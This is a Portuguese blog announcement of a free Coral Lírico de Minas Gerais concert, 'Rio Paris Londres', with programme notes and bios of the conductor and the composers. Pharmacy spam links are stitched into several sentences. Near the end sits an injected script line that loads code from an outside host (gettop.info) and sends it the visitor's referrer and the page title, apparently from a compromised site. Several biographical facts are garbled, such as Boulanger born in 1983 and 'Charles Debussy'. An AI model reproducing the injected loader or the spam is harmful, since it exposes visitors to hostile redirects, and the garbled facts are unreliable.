Minas GeraisMúsica coralProgramação

Coral Lírico de Minas Gerais em “Lírico na cidade”

Uma viagem musical com peças de compositores de várias nacionalidades, reunindo canções sacras e seculares da música coral do século XX.

SERVIÇO

 

Fundação de Educação Artística
Rua Gonçalves Dias
Informações para o público: (31) 3236-7400

Dia 28 de abril, às 20h30

Entrada franca

 

O Coral Lírico de Minas Gerais apresenta Rio Paris Londres, uma verdadeira viagem sonora elaborada para mais um concerto da série Lírico na Cidade. A apresentação celebra obras de compositores de três grandes cidades cosmopolitas, Rio de Janeiro, Paris e Londres, e o repertório combina canções sacras e seculares em um mosaico da música coral do século XX. Sob regência do maestro Lincoln Andrade, o Coral Lírico interpreta peças de Ernani Aguiar, Lili Boulanger, Johannes Brahms, Pills John Taverner, Giles Swayne, Henryk Mikolaj Górecki e Benjamin Britten.

A presidente da Fundação Clóvis Salgado, Fernanda Machado, explica que uma das características mais marcantes dos Corpos Artísticos da FCS, dentre eles o Coral Lírico de Minas Gerais, tem sido a diversidade de repertório. “Essa variedade evidencia, ainda mais, o compromisso da instituição em promover a fruição artística e garantir que o público tenha acesso às mais variadas formas de manifestações culturais”.


Diversidade musical

Do Rio de Janeiro, vem Missa Brevis II in honorem S. Francisci Assisiensis, do compositor ouro-pretano Ernani Aguiar, que atualmente vive entre Petrópolis, região Serrana do Rio de Janeiro, e a Capital Fluminense. A Missa é uma das mais recentes composições de Aguiar, que foi aluno de César Guerra-Peixe, e explora temas melódicos e motivos rítmicos, característicos das canções folclóricas e das melodias populares brasileiras.

A viagem musical do Coral Lírico chega a Paris para interpretar obras de dois grandes compositores franceses: Lili Boulanger e Claude Debussy. Hymme Pills mexican viagra online au Soleil, de Lili Boulanger, é inspirada no poema homônimo de Casimir Delavigne, e foi musicada para mezzo-soprano, coro e piano. O maestro Lincoln Andrade explica que Boulanger é uma das grandes representantes da música impressionista e “é considerada por Claude Debussy como a ‘Debussy de Saia’”. O maestro também destaca que a música de Boulanger é baseada em uma harmonia colorida e com fortes influências de Fauré e Debussy.

Ainda na Cidade Luz, o destaque vai para as Trois Chansons. As peças, compostas por Charles Debussy em 1908, conectam os estilos de composição do passado com as técnicas harmônicas modernas. As Trois Chansons são compostas por “Dieu! qu’il la fait”, “Quant j’aiouy” e “Yver”. Os textos são de Cheap Charles d’Orléans, príncipe e poeta, que foi preso na Inglaterra após a Batalha de Agincourt, em 1415.

Com escala na capital britânica, o Coral interpreta as canções inglesas The Lamb, de John Tavener, que exploram técnicas de composições bizantinas como cânones e inversões, palindromes e texturas silábicas, e Missa Tiburtina, de Giles Swayne, composta em Tivoli, próxima à Roma e dedicada a ser “um protesto contra à corrupção, à injustiça, à fome e à guerra no mundo”, como explica Lincoln Andrade. Ele ainda destaca que Swayne “é um grande desafio e leva o ouvinte a uma posição muito mais de reflexão do que de apreciação”.

Peças de Johannes Braham e Henryk Góerick compõem o programa. Drei Motteten, Brahms combina textos que apresentem uma imagem inicial de miséria, tristeza, ou aflição e se transformam em esperança, firmeza e gratidão. Já Totus tuus, de Henryk Górecki, é uma obra mântrica, que explora os timbres e as cores das vozes http://mindfulparenthood.org/buy-floxin-online/ a capela. A peça foi composta em 1987, durante a visita do papa João Paulo II à sua terra natal, a Polônia.

A jornada musical do Coral Lírico chega ao fim com Rejoice in the Lamb, do britânico Benjamin Britten. Composta em 1943, a cantata para quatro solistas, coro SATB – soprano, alto, tenor e baixo – e órgão, foi inspirada no poema Jubilat e Agno Order , do inglês http://radiorasaneh.com/2018/02/02/desyrel-how-much/ Christopher Smart. O poema, escrito enquanto Smart estava em uma casa para recuperação da sanidade mental, retrata o louvor e adoração ao divino, por todos os seres e todas as coisas criadas, cada um à sua maneira.


Lincoln Andrade

Possui doutorado em Regência pela University of Kansas (EUA) e mestrado em Regência Coral pela University of Wyoming (EUA), na qual também foi professor assistente e ministrou aulas de canto coral e regência coral. Premiado nos Estados Unidos e na Europa, o Maestro foi diretor musical do grupo Invoquei o Vocal, maestro titular do Madrigal de Brasília e do Coral Brasília. Ainda na capital federal, foi professor e diretor da Escola de Música de Brasília. Regeu concertos na Alemanha, Argentina, Chile, Espanha, Estados Unidos, França, Grécia, Hungria, Paraguai, Polônia, Portugal e Turquia. É produtor musical, apresentador e entrevistador do programa Conversa de Músico, produzido e veiculado pela TV Senado. Também é professor de regência e coordenador da Orquestra Sinfônica da Escola de Música da Universidade Federal de Minas Gerais (UFMG).


Coral Lírico de Minas Gerais
Criado em 1979, o Coral Lírico de Minas Gerais (CLMG), corpo artístico da Fundação Clóvis Salgado, é um dos raros grupos que possui uma programação artística permanente e interpreta um repertório diversificado que inclui motetos, polifonias, óperas, oratórios e concertos sinfônico-corais. É regido pelo maestro Lincoln Andrade. Além de participar de espetáculos autorais com a Orquestra Sinfônica de Minas Gerais e a Cia. de Dança Palácio das Artes, o CLMG participa de inúmeras produções que integram as temporadas de óperas realizadas pela Instituição. O Coral Lírico de Minas Gerais se apresenta em cidades do interior de Minas e em capitais brasileiras com o intuito de democratizar o acesso de diversos públicos ao canto coral. As apresentações são gratuitas ou com preços populares.

 

Sobre os compositores

Ernani Aguiar
Nasceu em Ouro Preto (MG), em 1950. É compositor, violista e maestro, e fez seus estudos musicais sob a orientação de nomes consagrados da música clássica. Regeu o grande coro da Catedral de Florença, e recebeu o título de Maestro de Capela em Santa Maria de Peretola. Dedica-se ao regimento de repertório brasileiro e contemporâneo internacional, à pesquisa de música brasileira do período colonial, e como compositor, tem suas obras presentes em programas de concertos, por todo o mundo.


Lili Boulanger

Nasceu na França em 1983. Foi compositora, em uma família musical. Apesar de sofrer discriminação por ser uma artista mulher, participou da produção de óperas. Suas obras apresentam influências do impressionismo de Debussy, tocantes e cheias de beleza e delicadeza. Faleceu também na França, em 1918.


Giles Swayne
Nasceu nos Estados Unidos em 1946 e dedicou-se ao piano desde a infância. Foi galardoado pela Academia Real de Música em 1968 com o Prêmio de Composição e é hoje aclamado como um dos grandes compositores do Reino Unido.


Johannes Brahms
Nasceu em 1833 na Alemanha e é um dos grandes representantes do romantismo. Filho de músico, demonstrou vocação para o piano já na infância. Foi maestro da Sociedade de Amigos da Música em 1872 e regeu a Orquestra Filarmônica de Viena por três temporadas seguidas. O compositor e pianista faleceu em 1897, em Viena.


John Tavener
Nasceu em Londres em 1944 e desde cedo foi considerado um prodígio pela imprensa inglesa. Sua música é profundamente marcada pelo sentimento religioso. Nessa linha, Tavener recupera o tonalismo da liturgia antiga e concebe sua música como uma mediação propriamente metafísica. Faleceu em 2013, também na Inglaterra.


Henryk Mikolaj Górecki
Nasceu em 1933 na região da Silésia. Suas obras refletiam a influência da música polaca e de temas da história de seu país. É considerado o pioneiro do minimalismo na música clássica contemporânea. Foi graduado pela Academia de Música de Katowice, onde mais tarde seria professor. Sua renúncia foi imposta após desacordo com a política de autoridades comunistas. Faleceu na Polônia em 2010.


Benjamin Britten

Nascido em 1913, na Inglaterra, foi compositor, maestro, violinista e pianista. Com dez anos de idade, já tinha composto diversos quartetos de cordas. Aos 14 anos, a lista de suas obras já alcançava 534 títulos. Em 1945, estreou a ópera autoral Peter Grimes, com sucesso estrondoso. Juntamente com Joan Cross, formou um novo projeto operístico, o English Opera Group, em 1947, e se dedicou a realizar digressões e a se especializar em óperas de câmera.

 

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.